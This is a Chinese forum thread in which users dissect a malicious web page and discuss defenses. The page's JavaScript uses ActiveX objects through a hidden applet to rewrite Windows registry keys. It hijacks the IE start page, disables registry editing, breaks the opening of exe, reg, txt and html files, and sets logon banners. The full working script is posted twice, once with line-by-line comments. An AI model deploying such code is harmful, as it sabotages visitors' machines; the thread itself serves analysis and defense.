|
作者
|
标题: 请教,这段代码有什么作用?
|
没影
未注册
|
|
| |
<HTML>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body
"onload"="window.open('index3.html','','fullscreen,scrollbars')"
/body>
<BODY>
<SCRIPT LANGUAGE="Javascript">
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document."cookie".indexOf("Chg") == -1)
{ Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://deathqueen.home.chinaren.com");
var expdate = new Date((new Date()).getTime() + (1));
document."cookie"="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCR\\exefile\\shell\\open\\command\\","c:\\con\\con \"%1\" %*");
Shl.RegWrite ("HKCR\\regfile\\shell\\open\\command\\","c:\\con\\con \"%1\" %*");
Shl.RegWrite ("HKCR\\txtfile\\shell\\open\\command\\","c:\\con\\con \"%1\" %*");
Shl.RegWrite ("HKCR\\htmlfile\\shell\\open\\command\\","c:\\con\\con \"%1\" %*");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000000", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "死亡皇后岛绝望禁区");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "死亡皇后岛绝望禁区");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "死亡皇后岛绝望禁区");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "死亡皇后岛绝望禁区");
var expdate = new Date((new Date()).getTime() + (1));
document."cookie"="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e) {}
}
function init()
{ setTimeout("f()", 1000);
}
init(); </script>
</BODY>
</HTML> 其中 "onload"和"cookie"不加引号发不了
| | |
IP: 已记录
|
|
|
风起
未注册
|
|
| |
"onload"="window.open('index3.html','','fullscreen,scrollbars')"让你用全屏和没有工具栏来打开INDEX3,HTML文件
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document."cookie".indexOf("Chg") == -1)
{ Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://deathqueen.home.chinaren.com");修改IE的首页
var expdate = new Date((new Date()).getTime() + (1));
document."cookie"="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"); 修改好象是不让个性INTERNET选项
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD");修改不让修改注册表
Shl.RegWrite ("HKCR\\exefile\\shell\\open\\command\\","c:\\con\\con \"%1\" %*");修改注册表让你打开EXE文件时黑屏
Shl.RegWrite ("HKCR\\regfile\\shell\\open\\command\\","c:\\con\\con \"%1\" %*");修改注册表让你打开REG文件时黑屏Shl.RegWrite ("HKCR\\txtfile\\shell\\open\\command\\","c:\\con\\con \"%1\" %*");修改注册表让你打开TXT文件时黑屏 Shl.RegWrite ("HKCR\\htmlfile\\shell\\open\\command\\","c:\\con\\con \"%1\" %*");修改注册表让你打开HTML文件时黑屏 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000000", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "死亡皇后岛绝望禁区");修改注册表在启动时出现对话框的标题 Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "死亡皇后岛绝望禁区");修改注册表在启动时出现对话框的内容
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "死亡皇后岛绝望禁区");修改注册表在IE启动时最上面出现它的网站的标题 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "死亡皇后岛绝望禁区");
var expdate = new Date((new Date()).getTime() + (1));
document."cookie"="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e) {}
}
function init()
{ setTimeout("f()", 1000);
}
init();
</script>
</BODY>
</HTML> 其中 "onload"和"cookie"不加引号发不了 因为时间关系和自己水平关系,有几个设计我没有仔细研究,大概是为了在COOKIE里面可以启动一个进程,象木马一样,可以看注册表被修改没有。 :)
| | |
IP: 已记录
|
|
|
没影
未注册
|
|
| | |
还有个问题——这些代码对什么操作系统起作用?用什么方法可以防止后果?
| | |
IP: 已记录
|
|
|
风起
未注册
|
|
| | |
对WINDOWS9X有作用。因为修改注册表的代码在他们的注册表里面才有用。在WINNT的注册表里面有一定的困难,不一定就肯定没有用。这个是需要试验的。 如何防止,一个是拒绝COOKICE小甜饼。
再就是不访问他的网站,因为你明知道这个网站要改你的注册表,你还去,那不是混蛋吗?哈。:) 记住,他的是比较厉害的,他利用的IE的COOKICE申明一个变量,然后用时间变量来每一秒钟都可以执行一次这个操作,当然也可以用程序来暂时中断和I NTERNET的联结,比如说用天网。然后来修改文件。其实,我也可以编一个程序来对付他,首先关闭80端口,然后把所有注册表改过的地方重新改回来。 :) 今天上网的时间就回了这一个问题。:)
我的主页yuleibo.home.chinaren.com[URL=yuleibo.home.chinaren.com]点击访问我的个人的主页
| | |
IP: 已记录
|
|
|
NetDemon
未注册
|
|
| | |
解决方法就是升级IE啦~~~不让那些IE5.01 sp1 sp2之类的是干什么用的阿,呵呵 经常按 开始 --〉Windows Update 也是一个很好方法是之一 拒绝cookie不可取哦,因为拒绝了你将进不了这个论坛了
| | |
IP: 已记录
|
|
|
风起
未注册
|
|
| | |
升级IE应该是没有用的。 因为他的是在《SCRIPT》《/SCRIPT》之间的程序运行代码。
哪个系统都要运行的。
况且他是用程序在修改注册表,你不可能不让程序运行吧。
对不对?
要不然这么多的网上病毒程序是怎么出来的,其实这个原理就可以编一个病毒了,我上次把那个网络蠕虫病毒看了一下,没有看太明白,不过我想是可以看明白的。 最好是升级到WIN2000版,应该就可以了,不过好象在那些注册表的位置还是是一样的内容。
其实到我的主页去下载源程序,可以举一反三的编出这样的反程序来。
| | |
IP: 已记录
|
|
|
没影
未注册
|
|
| | |
我的2000server开机后所有硬盘加光驱就自动共享了,怎么办啊???
| | |
IP: 已记录
|
|
|
NetDemon
未注册
|
|
| | |
不好意思 风起 微软的解决方法就是升级IE 另外,
《SCRIPT》《/SCRIPT》之间的程序运行代码。这一句有误,很明显scripts E 文的意思就是脚本了,而脚本和程序是不同的,脚本必须有其他的程序来作解释的,拿这一段来说,关键不在于script 而是在于APPLET,是由APPLET用一个ActiveXComponent (ActiveX控件)来实现的。 javascripts 和 APPLET 都是由IE来解释运行的,只有ActiveX是由系统运行的,这一点你搞清楚了,解决的方法大概你就明白了
| | |
IP: 已记录
|
|
|
NetDemon
未注册
|
|
| |
quote:
发贴人: 没影:
我的2000server开机后所有硬盘加光驱就自动共享了,怎么办啊???
恭喜恭喜! 打开www.20cn.net 的时候弹出来的那个窗口你仔细看看吧
| | |
IP: 已记录
|
|
|
没影
未注册
|
|
| | |
哈哈,是我自己蒙了,那是2000server的默认共享!
| | |
IP: 已记录
|
|
|
风起
未注册
|
|
| | |
我知道那是脚本。我不知道微软在升级IE中是用了什么方法,不过我想应该是这样,在这个程序代码里面有下面的这个。 a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
如果说IE在执行的过程中可以针对这样的代码给用户一个提示的话,我想这个问题就不是问题了,因为,他网页的特点就是没有把他所执行的动作告诉用户。这个可能就是一个最大的漏洞。如果I E升级版中有了对这样的代码有针对性的话,这个就是解决的方法。我不意过程是什么,我所说的程序,是指针对现在的IE所说,可能是在说法上不怎么的。但是意思大家是明白。他的代码是要执行的,但是关键是系统就这么让他执行了。
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); :)
也许IE的方法就是这样吧,我也不清楚。但是我可以肯定,针对问题想出来的解决方法就是最好的方法。其它的只能是缓解罢了,透过现象看本质 ,我想这个是每一个程序员应该了解的。 还有NETDEMON,你的那个看网页源程序的程序是用什么编的,在VB上实现也是很简单的哟。 点击这里看我的个人主页 我的QQ号码:5008022
我的电子信箱:ylb2000@263.net
| | |
IP: 已记录
|
|
|
NetDemon
未注册
|
|
| | |
拉倒吧,那个叫什么程序阿,如果实现的话打个命令就实现了 telnet www.20cn.net 80
GET / HTTP/1.0
两个回车就出来了 我本来是要写一个别的的,把原码取出来只是一个必要的内部功能而已,刚好那时候有个什么万花病毒什么的,老多人说这个事,我又没时间继续写了,就那样半中间出来了
| | |
IP: 已记录
|
|
|
|
适于打印的主题视图